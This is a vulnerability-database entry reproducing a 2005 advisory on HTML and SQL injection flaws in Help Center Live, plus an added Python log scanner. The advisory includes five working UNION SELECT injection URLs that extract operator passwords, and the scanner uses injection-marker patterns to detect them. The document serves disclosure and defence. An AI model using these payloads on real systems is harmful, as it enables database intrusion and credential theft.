HelpCenter Live! 1.0/1.2.x – Multiple Input Validation Vulnerabilities

Vulnerability ID 1055127 Vulnerability type
Published 2005-05-24 Updated 2005-05-24
CVE ID N/A
CNNVD-ID N/A
Platform PHP CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/25683
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/13666/info

Help Center Live is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Reportedly the application is affected by multiple HTML injection vulnerabilities. Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

The application is also affected by multiple SQL injection vulnerabilities. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

These issues have reportedly been addressed in the latest release of Help Center Live; this information has not been confirmed by Symantec or the vendor.

http://www.example.com/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200,
0,operator,password%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/view.php?tid=-99'%20UNION%20SELECT%200,0,0,
operator,password,0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/download.php?fid=-99'%20UNION%20SELECT%200,0,0,
password,0,operator,0,0%20FROM%20hcl_operators%20WHERE%20id='1

http://www.example.com/support/lh/icon.php?status=-99' UNION SELECT
password,password FROM hcl_operators WHERE id=1/*

http://www.example.com/support/lh/chat_download.php?fid=-99' UNION
SELECT password,operator,password FROM hcl_operators WHERE id=1/*
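
For defenders reviewing web server logs of an affected install, the following is an added example, not part of the original advisory or of Help Center Live. It flags requests to the five scripts and parameters shown above when the decoded value carries the markers seen in those URLs. It assumes combined-format access logs; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path suffix -> parameter, taken from the advisory's example URLs.
WATCHED = {
    "/faq/index.php": "id",
    "/tt/view.php": "tid",
    "/tt/download.php": "fid",
    "/lh/icon.php": "status",
    "/lh/chat_download.php": "fid",
}
# Request target in a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Markers present in the advisory's URLs: quote, UNION ... SELECT, open comment.
SQL_MARKERS = re.compile(r"'|\bunion\b.+\bselect\b|/\*", re.I | re.S)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %2527 is still seen as a quote."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def suspicious_requests(log_lines):
    """Return (line_number, path, parameter, decoded_value) for each hit."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        param = next((p for s, p in WATCHED.items() if target.path.endswith(s)), None)
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            value = fully_decode(value)
            if name == param and SQL_MARKERS.search(value):
                hits.append((number, target.path, name, value))
    return hits


# Constructed sample log lines (addresses from the 192.0.2.0/24 documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/May/2005:10:00:01 +0000] "GET /support/faq/index.php?x=f&id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/May/2005:10:00:07 +0000] "GET /support/faq/index.php?x=f&id=-99%27%20UNION%20SELECT%200,0,operator,password%20FROM%20hcl_operators%20WHERE%201/* HTTP/1.1" 200 734',
    '192.0.2.44 - - [24/May/2005:10:00:09 +0000] "GET /support/tt/view.php?tid=-99%2527%2520UNION%2520SELECT%25200 HTTP/1.1" 200 810',
    '192.0.2.10 - - [24/May/2005:10:00:15 +0000] "GET /support/lh/icon.php?status=online HTTP/1.1" 200 420',
]
```

Calling `suspicious_requests(SAMPLE_LOG)` reports lines 2 and 3, the second of which is only caught because the value is decoded repeatedly before matching.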
